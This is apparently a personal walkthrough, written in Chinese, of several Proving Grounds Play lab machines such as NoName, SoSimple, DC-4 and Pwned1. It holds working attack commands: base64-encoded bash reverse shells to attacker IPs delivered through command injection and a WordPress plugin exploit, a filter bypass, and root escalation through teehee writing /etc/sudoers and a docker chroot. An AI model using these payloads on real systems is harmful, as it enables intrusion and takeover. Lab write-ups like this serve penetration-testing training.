Proving Grounds Play Intermediate

:::spoiler echo * [toc] ::: # BTRSys2.1 21 22 80 port 開著，並且ftp 允許anonymous登入，登入後啥都沒有，並且上傳不了任何東西，透過`wpscan`得出有admin等user 後來嘗試弱密碼admin/admin可以登入成功，原本查看plugin發現其中一個plugin可以成功LFI並且嘗試讀取`/etc/passwd`有成功，試過各種方法讀取log都失敗，後來直接上傳php reverse shell 上去。 ![image](https://hackmd.io/_uploads/B138Mp25A.png) 提權的部分，嘗試了linux 可以用的套路後解決不了，在`cat wp-config.php`得到mysql 的username、password ![image](https://hackmd.io/_uploads/ByErI6nq0.png) 執行mysql ```sql mysql -u root -h localhost -p show databases; use wordpress; show tables; SELECT * FROM wp_users LIMIT 5; ``` ![image](https://hackmd.io/_uploads/Hy69YT29C.png) 看到root hash ，懶的爆破直接拿去[crackstation](https://crackstation.net/)得知root password `roottoor` ![image](https://hackmd.io/_uploads/S1VF962c0.png) # NoName 一開始掃前20 top ports 只開22 port ，網頁打開 ![image](https://hackmd.io/_uploads/Sy8dA3eo0.png) 只有這樣甚麼都沒有，做一次全面性的端口掃描、網站目錄枚舉，還是只開80 port ，找到superamdin.php。 ```bash ┌──(kali㉿LAPTOP-FKRJU4AD)-[~] └─$ gobuster dir -u http://192.168.157.15/ -w /usr/share/wordlists/dirb/big.txt -x .txt,.php,.html =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://192.168.157.15/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/big.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Extensions: txt,php,html [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /.htaccess (Status: 403) [Size: 279] /.htaccess.html (Status: 403) [Size: 279] /.htpasswd.php (Status: 403) [Size: 279] /.htaccess.php (Status: 403) [Size: 279] /.htaccess.txt (Status: 403) [Size: 279] /.htpasswd (Status: 403) [Size: 279] /.htpasswd.html (Status: 403) [Size: 279] /.htpasswd.txt (Status: 403) [Size: 279] /admin (Status: 200) [Size: 417] /index.php (Status: 200) [Size: 201] /server-status (Status: 403) [Size: 279] /superadmin.php (Status: 200) [Size: 152] Progress: 81876 / 81880 (100.00%) =============================================================== Finished =============================================================== ``` 網頁打開是個明顯的command injection，經過幾次嘗試後`|l\s`可以成功執行出來 ![image](https://hackmd.io/_uploads/BJ8RHpei0.png) 這邊用`|ca\t su*`可以看到網頁具體的限制 ```php <?php if (isset($_POST['submitt'])) { $word=array(";","&&","/","bin","&"," &&","ls","nc","dir","pwd"); $pinged=$_POST['pinger']; $newStr = str_replace($word, "", $pinged); if(strcmp($pinged, $newStr) == 0) { $flag=1; } else { $flag=0; } } if ($flag==1){ $outer=shell_exec("ping -c 3 $pinged"); echo "<pre>$outer</pre>"; } ?> ``` 這裡用`|echo "c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC40NS4xOTQvNDQ0NCAwPiYx" | base64 -d | bash`其中base64 的部分是`sh -i >& /dev/tcp/192.168.45.194/4444 0>&1`成功拿到reverse shell ![image](https://hackmd.io/_uploads/BkyjuTgsC.png) 之後再找suid時發現有find可以利用 ![image](https://hackmd.io/_uploads/B1rin6ejC.png) # ICMP 基本的port scan ，22 80 port open 之後網頁打開看了下沒啥好打的，搜版本發現有RCE漏洞 ![image](https://hackmd.io/_uploads/SkRpA6eoR.png) ![image](https://hackmd.io/_uploads/HJOB-Cej0.png) 提權部分又到了討厭的通靈部分，嘗試過一些基本題權方法都不行，最後去看一下發現有奇怪的資料夾只能執行不能讀，讀了reminder裡面寫 ``` crypt with crypt.php: done, it works work on decrypt with crypt.php: howto?!? ``` 通靈1猜它在 ./devel/crypt.php ```bash www-data@icmp:/home/fox$ cat ./devel/crypt.php cat ./devel/crypt.php <?php echo crypt('BUHNIJMONIBUVCYTTYVGBUHJNI','da'); ?> ``` 通靈2這就是fox 的user password ```bash www-data@icmp:/home/fox$ ls -al ls -al total 20 drwxr-xr-x 3 root root 4096 Dec 3 2020 . drwxr-xr-x 3 root root 4096 Dec 3 2020 .. lrwxrwxrwx 1 root root 9 Dec 3 2020 .bash_history -> /dev/null drwx--x--x 2 fox fox 4096 Dec 3 2020 devel -rw-r--r-- 1 fox fox 33 Aug 19 15:04 local.txt -rw-r--r-- 1 root root 78 Dec 3 2020 reminder ``` 之後用ssh 連進去找了一下`sudo -l`發現有hping3，在gtfobins發現可以利用使用如下: 開兩個session ```bash $ sudo hping3 --icmp 127.0.0.1 --listen signature --safe --listen signature->HPING3 listen mode, using this option hping3 waits for packet that contain signature and dump from signature end to packet's end ``` ```bash $ sudo /hping3 --icmp 127.0.0.1 -d 100 --sign signature --file /root/proof.txt --sign signature -> This is for packet identity,This is used to add a signature to the data payload of sent packets. This signature can be any arbitrary string of characters, and it will be included in the packet's data section. -d ->data size ``` ![image](https://hackmd.io/_uploads/BkAKKAxs0.png) # Loly port scan result 80 port open (noly) 之後用找到目錄wordpress 用wpscan 找到user Loly password fernando ![image](https://hackmd.io/_uploads/BJAbpGMj0.png) # SoSimple port scan result 22 80 port open 也是一樣找到wordpress目錄用wpscan ![image](https://hackmd.io/_uploads/rJ0-1rQiA.png) 搜尋social-warfare找到可以RCE，參考了一下這個github 上的[exploit](https://github.com/hash3liZer/CVE-2019-9978)，但是我的PoC 是 **payload.txt** ```html <pre>system('echo "c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC40NS4yNDQvNDQ0NCAwPiYx" | base64 -d | bash')</pre> ``` 在本機開一個http.server，再透過上面的exploit 執行 ```python python2 CVE-2019-9978.py -t http://192.168.168.78/wordpress/ --payload-uri http://192.168.45.244:8000/payload.txt ``` ![image](https://hackmd.io/_uploads/HJAXfI7iC.png) 之後因為在一開始做wpscan 有順便找到user max，在上面的圖片也有max user合理懷疑兩個的password會是一樣用wpscan 找到password opensesame ![image](https://hackmd.io/_uploads/rJmdNI7oC.png) 但是用ssh 連進去失敗，之後再max 家目錄找到id_rsa，利用後成功登入 ![image](https://hackmd.io/_uploads/H1J3H8XoC.png) `sudo -l`之後可以看到`/usr/sbin/service/`可以在不需要密碼的情況下以steven的身分執行，拿到steven shll 後`sudo -l`看到`/opt/tools/server-health.sh`可以被利用，原本cat 那個檔案但是檔案不存在 ![image](https://hackmd.io/_uploads/BJJT1vQiR.png) 之後自己把`/bin/bash`寫進去`server-health.sh`用sudo 去執行就拿到root 了 ![image](https://hackmd.io/_uploads/HyGuXPXiA.png) # DC-4 基本的port scan 22 80 port open，去戳網站是一個login page，不像是有slqi 的跡象，爆破網站目錄也沒有收穫，就只好去爆破登入，嘗試admin/happy登入成功 ![image](https://hackmd.io/_uploads/r1xfaKthR.png) 登入後可以看到一個明顯的command injection 頁面 ![image](https://hackmd.io/_uploads/By35TFY2R.png) 修改封包，成功拿到reverse sehll。 ```json radio=echo "c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC40NS4xNjgvNDQ0NCAwPiYx" | base64 -d | bash &submit=Run ``` ![image](https://hackmd.io/_uploads/By-3CtYh0.png) 其中在user jim 中可以找到old-passwords.bak裡面有許多密碼把它copy出來爆破看看 ![image](https://hackmd.io/_uploads/B16UU5Y20.png) 根據那個password list 和已知的user 建立兩個字典，用hydra 爆看看有沒有機會 ![image](https://hackmd.io/_uploads/r1hQ_9tnA.png) 以jim的身分登入進去後，盡可能的提權，沒用，檢查mail看到另一位user charles 的 password ![image](https://hackmd.io/_uploads/BJ3Ch5K2R.png) 切換為charles`sudo -l`可以看到`/usr/bin/teehee`可以無密碼使用，猜測這個功能應該是`tee`，GTFOBins查了一下tee，發現這功能可以寫入，於是把charles寫入`/etc/sudoers`讓他也有root 的身分 ```bash charles@dc-4:~$ sudo -l Matching Defaults entries for charles on dc-4: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User charles may run the following commands on dc-4: (root) NOPASSWD: /usr/bin/teehee charles@dc-4:~$ echo "charles ALL=(ALL:ALL) ALL" | sudo /usr/bin/teehee -a /etc/sudoers charles ALL=(ALL:ALL) ALL charles@dc-4:~$ su root Password: su: Authentication failure charles@dc-4:~$ sudo su [sudo] password for charles: root@dc-4:/home/charles# cat /root/proof.txt e4951b05703a5c6287b20ab096c6c0fe root@dc-4:/home/charles# ``` ![image](https://hackmd.io/_uploads/B1EdljY30.png) # Pwned1 21,22,80 port open 爆破目錄超級久，找到`/hidden_text`，裡面有一個檔案`secret.dic`點進去後可以看到更多的目錄，其中只有`/pwned.vuln`可以訪問 ![image](https://hackmd.io/_uploads/S1hF9A-TR.png) 到了該目錄，可以看到一個輸入框初步測試不存在sqli ![image](https://hackmd.io/_uploads/ryzWoAbaC.png) 用burpsuite抓包可以看到在respone 含有php code ![image](https://hackmd.io/_uploads/BktVoRZ60.png) 可惜寫在裡面的帳密不是網頁登入的帳密，反而是通靈到ftp 的username & password ftp 連線進去後可以看到 share directory 進去後有`id_rsa`，和`note.txt`在裡面把它下載下來登入，並且用`note.txt`裡面提到的人名 ariana 登入 ```bash ┌──(kali㉿G)-[/tmp] └─$ cat note.txt Wow you are here ariana won't happy about this note sorry ariana :( ``` ```bash ┌──(kali㉿G)-[/tmp] └─$ sudo chmod 600 id_rsa [sudo] password for kali: ┌──(kali㉿G)-[/tmp] └─$ ssh -i id_rsa ariana@192.168.171.95 Linux pwned 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. ariana@pwned:~$ cat local.txt 59cd03d49cee9d05b419e4b56444da35 ariana@pwned:~$ ``` 提權的部分 `sudo -l` 可以看到 `(selena) NOPASSWD: /home/messenger.sh`可以利用 ```bash ariana@pwned:/home$ cat messenger.sh #!/bin/bash clear echo "Welcome to linux.messenger " echo "" users=$(cat /etc/passwd | grep home | cut -d/ -f 3) echo "" echo "$users" echo "" read -p "Enter username to send message : " name echo "" read -p "Enter message for $name :" msg echo "" echo "Sending message to $name " $msg 2> /dev/null echo "" echo "Message sent to $name :) " echo "" ``` 可以注意到這個shell script 的 `$msg` 是可以直接被執行的，先水平提權到 selena ```bash ariana@pwned:/home$ sudo -u selena ./messenger.sh ``` ```bash Welcome to linux.messenger ariana: selena: ftpuser: Enter username to send message : asdf Enter message for asdf :/bin/bash Sending message to asdf id uid=1001(selena) gid=1001(selena) groups=1001(selena),115(docker) python3 -c 'import pty;pty.spawn("/bin/bash")' selena@pwned:/home$ ``` 經過了基本的提權方法都無效後反覆觀察發現 docker 跟我們在同一個群組，利用 [gtfobins](https://gtfobins.github.io/gtfobins/docker/)提權 ```bash selena@pwned:/home$ id uid=1001(selena) gid=1001(selena) groups=1001(selena),115(docker) selena@pwned:/home$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh # cat /root/proof.txt 5afb73776252b8a2e48a250cc2f172c1 # ```